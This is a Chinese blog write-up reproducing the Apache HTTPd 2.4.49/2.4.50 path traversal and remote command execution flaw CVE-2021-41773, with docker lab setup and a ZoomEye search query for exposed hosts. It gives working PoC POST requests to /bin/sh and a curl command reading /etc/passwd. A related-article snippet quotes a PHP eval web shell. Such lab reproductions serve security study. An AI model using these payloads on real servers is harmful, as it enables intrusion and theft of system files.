Apache HTTPd RCE漏洞复现(cve-2021-41773)

时间：2023-08-17 15:22:57浏览次数：40

标签：bin HTTPd 41773 32% application 65 2021 Apache 2e%

0x01 漏洞简介：

Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。在Apache HTTPd 2.4.49版本中，存在一个路径穿越漏洞。在配置了 Require all granted后，攻击者可利用路径穿越漏洞读取到Web目录之外的其他文件，比如/etc/passwd文件。同时若Apache HTTPd开启了cgi支持，并能够访问到/bin/sh的情况下，攻击者可构造恶意请求执行命令，从而控制服务器，危害严重。

0x02 影响版本：

ApacheHTTPd 2.4.49 ApacheHTTPd 2.4.50

0x03 漏洞等级:

高危

0x04 环境搭建:

这里提供两个搭建方法可自行选择

docker部署命令（一）：

docker pull blueteamsteve/cve-2021-41773:with-cgid
docker run -d -p 7006:80 blueteamsteve/cve-2021-41773:with-cgid

搭建成功访问是这个酱紫！

http://ip:7006

docker部署命令（二）：

git clonehttps://github.com/blasty/CVE-2021-41773.git
cd CVE-2021-41773/
docker-compose build 
docker-compose up -d

搭建成功访问是这个酱紫！

http://ip:8080

0x05 影响范围：

根据ZoomEye网络空间搜索引擎对潜在可能目标进行搜索，共得到 566,346 条IP历史记录。

ZoomEye语法：

app:"apache web server 2.4.49 2.4.50"

0x06 漏洞复现：

PoC:

POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: ip:port
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
If-None-Match: "29cd-5ce4665e39700-gzip"
If-Modified-Since: Thu, 14 Oct 2021 01:57:16 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

echo Content-Type: text/plain; echo; id

POST /cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/bin/sh HTTP/1.1
Host: ip:port
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
If-None-Match: "29cd-5ce4665e39700-gzip"
If-Modified-Since: Thu, 14 Oct 2021 01:57:16 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 12

echo; whoami

curl --data "echo;cat /etc/passwd" 'http://ip:port/cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/bin/sh'

标签：bin,HTTPd,41773,32%,application,65,2021,Apache,2e%
From： https://www.cnblogs.com/1zzZ/p/17637671.html

Apache HTTPd换行解析漏洞复现CVE-2017-15715
ApacheHTTPd换行解析漏洞复现CVE-2017-15715漏洞利用漏洞利用条件Apache:2.4.0~2.4.29实际存到后端时的文件名可控漏洞利用方式bp中更改存放到后端的文件名假设原文件名为"evil.php"文件存放在网站根目录下evil.php的内容为:<?php@eval($_REQUEST[1]);?>操作:......
Apache ECharts_入门
......
Apache ECharts_介绍
......
Apache Hive相关基础学习
1、Hive概念使用Hive处理数据的好处：2、Hive与Hadoop的关系3、ApacheHive架构图、组件架构图：组件1、用户接口2、元数据存储（表和文件之间的映射关系）3、Driver驱动程序，包括语法解释器、计划编译器、优化器、执行器4、执行引擎......
apache+php配置
apache配置 php配置php.ini-development复制一份改名为php.ini 修改php.ini文件(php应该下载的不是这个nts文件，应该是没有nts的)设置系统变量 apache，启动！ ......
Apache Dubbo 云原生可观测性的探索与实践
作者：宋小生-平安壹钱包中间件资深工程师Dubbo3可观测能力速览ApacheDubbo3在云原生可观测性方面完成重磅升级，使用Dubbo3最新版本，你只需要引入 dubbo-spring-boot-observability-starter依赖，微服务集群即原生具备以下能力：能力一：可视化查看集群、单机流量指标与健康状态Dubb......
Apache Dubbo 云原生可观测性的探索与实践
作者：宋小生-平安壹钱包中间件资深工程师Dubbo3可观测能力速览ApacheDubbo3在云原生可观测性方面完成重磅升级，使用Dubbo3最新版本，你只需要引入 dubbo-spring-boot-observability-starter依赖，微服务集群即原生具备以下能力：能力一：可视化查看集群、单机流量指标与健康状态......
Apache Flink目录遍历漏洞复现CVE-2020-17519
ApacheFlink目录遍历漏洞复现CVE-2020-17519前置知识ApacheFlink:ApacheFlink是一个框架和分布式处理引擎，用于在无边界和有边界数据流上进行有状态的计算。Flink能在所有常见集群环境中运行，并能以内存速度和任意规模进行计算。漏洞利用条件:ApacheFlink版本为1.11.0......
ubuntu安装apache
要在Ubuntu上安装Apache，请按照以下步骤进行操作：打开终端。更新包列表。使用以下命令进行更新：Copysudoaptupdate安装Apache。使用以下命令进行安装：Copysudoaptinstallapache2安装过程中，系统会要求你输入用户密码。安装完成后，可以使用以下命......
图加速数据湖分析-GeaFlow和Apache Hudi集成
表模型现状与问题关系模型自1970年由埃德加·科德提出来以后被广泛应用于数据库和数仓等数据处理系统的数据建模。关系模型以表作为基本的数据结构来定义数据模型，表为二维数据结构，本身缺乏关系的表达能力，关系的运算通过Join关联运算来处理。表模型简单且易于理解，在关系模型中被广......

Apache HTTPd RCE漏洞复现(cve-2021-41773)

相关文章

赞助商

阅读排行